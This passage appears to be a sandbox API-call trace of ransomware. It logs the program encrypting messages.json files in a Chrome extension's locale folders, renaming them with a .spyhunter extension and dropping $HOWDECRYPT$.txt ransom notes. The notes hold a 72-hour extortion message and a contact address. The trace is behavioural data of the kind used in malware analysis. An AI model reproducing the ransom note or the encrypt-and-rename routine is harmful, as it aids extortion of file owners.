(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.073] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eaf4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.074] CloseHandle (hObject=0x178) returned 1 [0159.074] GetProcessHeap () returned 0x2c0000 [0159.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e5f8 | out: hHeap=0x2c0000) returned 1 [0159.074] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea90 | out: pbBuffer=0x270ea90) returned 1 [0159.074] GetProcessHeap () returned 0x2c0000 [0159.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.074] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea88*=0x30) returned 1 [0159.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.075] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0159.075] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.075] GetProcessHeap () returned 0x2c0000 [0159.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.075] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea4c*=0x144, lpOverlapped=0x0) returned 1 [0159.076] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffebc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.076] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x270ea4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea4c*=0x144, lpOverlapped=0x0) returned 1 [0159.076] GetProcessHeap () returned 0x2c0000 [0159.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.076] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.076] WriteFile (in: hFile=0x178, lpBuffer=0x270ea8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea4c, lpOverlapped=0x0 | out: lpBuffer=0x270ea8c*, lpNumberOfBytesWritten=0x270ea4c*=0x4, lpOverlapped=0x0) returned 1 [0159.076] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea4c*=0x30, lpOverlapped=0x0) returned 1 [0159.076] CloseHandle (hObject=0x178) returned 1 [0159.076] GetProcessHeap () returned 0x2c0000 [0159.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.076] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.spyhunter") returned 165 [0159.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0159.077] GetProcessHeap () returned 0x2c0000 [0159.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.077] GetProcessHeap () returned 0x2c0000 [0159.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.077] GetProcessHeap () returned 0x2c0000 [0159.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e470 | out: hHeap=0x2c0000) returned 1 [0159.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.078] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.078] WriteFile (in: hFile=0x178, lpBuffer=0x270e9c3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eaec, lpOverlapped=0x0 | out: lpBuffer=0x270e9c3*, lpNumberOfBytesWritten=0x270eaec*=0x127, lpOverlapped=0x0) returned 1 [0159.079] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.079] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eaec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eaec*=0x2ac, lpOverlapped=0x0) returned 1 [0159.079] CloseHandle (hObject=0x178) returned 1 [0159.079] GetProcessHeap () returned 0x2c0000 [0159.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e2e8 | out: hHeap=0x2c0000) returned 1 [0159.079] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea88 | out: pbBuffer=0x270ea88) returned 1 [0159.079] GetProcessHeap () returned 0x2c0000 [0159.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.080] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea80*=0x30) returned 1 [0159.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.080] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0159.080] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.080] GetProcessHeap () returned 0x2c0000 [0159.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.080] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea44*=0x127, lpOverlapped=0x0) returned 1 [0159.081] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffed9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.081] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea44*=0x127, lpOverlapped=0x0) returned 1 [0159.081] GetProcessHeap () returned 0x2c0000 [0159.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.082] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.082] WriteFile (in: hFile=0x178, lpBuffer=0x270ea84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea44, lpOverlapped=0x0 | out: lpBuffer=0x270ea84*, lpNumberOfBytesWritten=0x270ea44*=0x4, lpOverlapped=0x0) returned 1 [0159.082] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea44*=0x30, lpOverlapped=0x0) returned 1 [0159.082] CloseHandle (hObject=0x178) returned 1 [0159.082] GetProcessHeap () returned 0x2c0000 [0159.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.082] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.spyhunter") returned 165 [0159.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0159.083] GetProcessHeap () returned 0x2c0000 [0159.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.083] GetProcessHeap () returned 0x2c0000 [0159.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.083] GetProcessHeap () returned 0x2c0000 [0159.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e160 | out: hHeap=0x2c0000) returned 1 [0159.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.084] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.084] WriteFile (in: hFile=0x178, lpBuffer=0x270e9bb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eae4, lpOverlapped=0x0 | out: lpBuffer=0x270e9bb*, lpNumberOfBytesWritten=0x270eae4*=0x127, lpOverlapped=0x0) returned 1 [0159.085] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.085] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eae4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eae4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.085] CloseHandle (hObject=0x178) returned 1 [0159.085] GetProcessHeap () returned 0x2c0000 [0159.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1dfd8 | out: hHeap=0x2c0000) returned 1 [0159.085] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea80 | out: pbBuffer=0x270ea80) returned 1 [0159.085] GetProcessHeap () returned 0x2c0000 [0159.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.085] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea78*=0x30) returned 1 [0159.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0159.086] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.086] GetProcessHeap () returned 0x2c0000 [0159.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.086] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea3c*=0xea, lpOverlapped=0x0) returned 1 [0159.087] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.087] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x270ea3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea3c*=0xea, lpOverlapped=0x0) returned 1 [0159.087] GetProcessHeap () returned 0x2c0000 [0159.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.087] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.088] WriteFile (in: hFile=0x178, lpBuffer=0x270ea7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea3c, lpOverlapped=0x0 | out: lpBuffer=0x270ea7c*, lpNumberOfBytesWritten=0x270ea3c*=0x4, lpOverlapped=0x0) returned 1 [0159.088] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea3c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea3c*=0x30, lpOverlapped=0x0) returned 1 [0159.088] CloseHandle (hObject=0x178) returned 1 [0159.088] GetProcessHeap () returned 0x2c0000 [0159.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.088] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.spyhunter") returned 165 [0159.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0159.089] GetProcessHeap () returned 0x2c0000 [0159.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.089] GetProcessHeap () returned 0x2c0000 [0159.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.089] GetProcessHeap () returned 0x2c0000 [0159.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1dcc8 | out: hHeap=0x2c0000) returned 1 [0159.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.090] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.091] WriteFile (in: hFile=0x178, lpBuffer=0x270e9b3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eadc, lpOverlapped=0x0 | out: lpBuffer=0x270e9b3*, lpNumberOfBytesWritten=0x270eadc*=0x127, lpOverlapped=0x0) returned 1 [0159.091] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.091] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eadc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eadc*=0x2ac, lpOverlapped=0x0) returned 1 [0159.091] CloseHandle (hObject=0x178) returned 1 [0159.092] GetProcessHeap () returned 0x2c0000 [0159.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d9e0 | out: hHeap=0x2c0000) returned 1 [0159.092] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea78 | out: pbBuffer=0x270ea78) returned 1 [0159.092] GetProcessHeap () returned 0x2c0000 [0159.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.092] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea70*=0x30) returned 1 [0159.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 